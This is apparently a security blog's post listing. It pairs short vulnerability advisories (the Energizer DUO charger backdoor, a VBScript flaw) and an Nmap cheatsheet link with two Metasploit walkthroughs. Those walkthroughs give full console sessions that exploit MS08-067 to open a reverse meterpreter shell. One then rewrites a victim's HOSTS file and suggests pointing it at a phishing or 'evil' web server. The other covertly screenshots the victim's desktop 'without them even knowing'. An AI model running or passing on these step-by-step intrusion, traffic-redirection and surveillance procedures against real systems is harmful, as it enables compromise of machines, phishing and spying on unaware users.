Energizer DUO USB battery charger software allows unauthorized remote system access

Energizer DUO is a USB battery charger. Included with the charger is a Windows application that allows the user to view the battery charging status. The installer for the Energizer DUO software places the file UsbCharger.dll in the application’s directory and Arucer.dll in the Windows system32 directory. When the Energizer UsbCharger software executes, it utilizes the UsbCharger.dll component for providing USB communication capabilities. UsbCharger.dll executes Arucer.dll via the Windows rundll32.exe mechanism, and it also configures Arucer.dll to execute automatically when Windows starts by creating an entry in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.

Source:
http://www.kb.cert.org/vuls/id/154421

Posted in General BS, Hardware, Internet, Privacy, Security | 2 Comments

Vulnerability in VBScript Could Allow Remote Code Execution

Microsoft is investigating new public reports of a vulnerability in VBScript that is exposed on supported versions of Microsoft Windows 2000, Windows XP, and Windows Server 2003 through the use of Internet Explorer. Our investigation has shown that the vulnerability cannot be exploited on Windows 7, Windows Server 2008 R2, Windows Vista, or Windows Server 2008. The main impact of the vulnerability is remote code execution. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.

The vulnerability exists in the way that VBScript interacts with Windows Help files when using Internet Explorer. If a malicious Web site displayed a specially crafted dialog box and a user pressed the F1 key, arbitrary code could be executed in the security context of the currently logged-on user. On systems running Windows Server 2003, Internet Explorer Enhanced Security Configuration is enabled by default, which helps to mitigate against this issue.

Source:
http://www.microsoft.com/technet/security/advisory/981169.mspx

Posted in Internet, Security, Windows | No Comments

NMAP 5 Cheatsheet

Here’s a nice little cheatsheet for NMAP 5 making it’s rounds today on the internet:

http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

Very handy.

Posted in Internet, Networking, Security, Software | No Comments

Modifying The Victim’s HOSTS File In Metasploit

This is just a quick example of how you can quickly and easily modify the HOSTS file on a compromised Windows system using the meterpreter script called hostsedit.  As always, we start off with a basic exploit to gain a meterpreter session back from the victim’s machine:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1085)

meterpreter >

Now we are just going to run the hostsedit meterpreter script, look at the options, and modify the HOSTS file:

meterpreter > run hostsedit -h
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.

OPTIONS:

-e Host entry in the format of IP,Hostname.
-h Help Options.
-l Text file with list of entries in the format of IP,Hostname. One per line.

Example:

run hostsedit -e 127.0.0.1,google.com

run hostsedit -l /tmp/fakednsentries.txt

meterpreter > run hostsedit -e 127.0.0.1,www.google.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts82257.back
[*] Adding Record for Host www.google.com with IP 127.0.0.1
[*] Clearing the DNS Cache
meterpreter >

Looks like it was successful.  Let’s see:

Worked like a charm.  Of course you can do many other things than to just pipe www.google.com to localhost.  (setup an evil web server lately??  simple phishing site??)

Posted in Internet, Privacy, Security, Windows | 1 Comment

Taking Screenshots Of The Victim’s Computer With Metasploit

Here’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module.  Start with a basic exploit to gain a meterpreter session.  You’ll need to make sure you migrate to a process that has access to Active Desktop or else you will get nothing but blank images:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1100)

meterpreter > ps

Process list
============

PID   Name   Arch   User   Path
—   —-   —-   —-   —-
0   [System Process]
4   System   x86   NT AUTHORITY\SYSTEM
384   smss.exe   x86   NT AUTHORITY\SYSTEM   \SystemRoot\System32\smss.exe
524   csrss.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\csrss.exe
556   winlogon.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\winlogon.exe
692   services.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\services.exe
704   lsass.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\lsass.exe
876   VBoxService.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\VBoxService.exe
904   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\svchost.exe
972   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1064   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\System32\svchost.exe
1124   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1192   svchost.exe   x86   NT AUTHORITY\LOCAL SERVICE   C:\WINDOWS\system32\svchost.exe
1452   spoolsv.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\spoolsv.exe
284   explorer.exe   x86   VM-WINXP\Troy   C:\WINDOWS\Explorer.EXE
624   VBoxTray.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\VBoxTray.exe
632   ctfmon.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\ctfmon.exe
656   alg.exe   x86 NT   AUTHORITY\LOCAL SERVICE   C:\WINDOWS\System32\alg.exe
1252   wscntfy.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\wscntfy.exe
1940   firefox.exe   x86   VM-WINXP\Troy   C:\Program Files\Mozilla Firefox\firefox.exe

meterpreter > migrate 284
[*] Migrating to 284…
[*] Migration completed successfully.
meterpreter >

Now we load the espia module and view the victim’s live desktop:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]

meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >

The image should open automatically and display on your screen:

That’s it.  You are now viewing the victim’s desktop without them even knowing you are there.

Posted in Internet, Networking, Privacy, Security | No Comments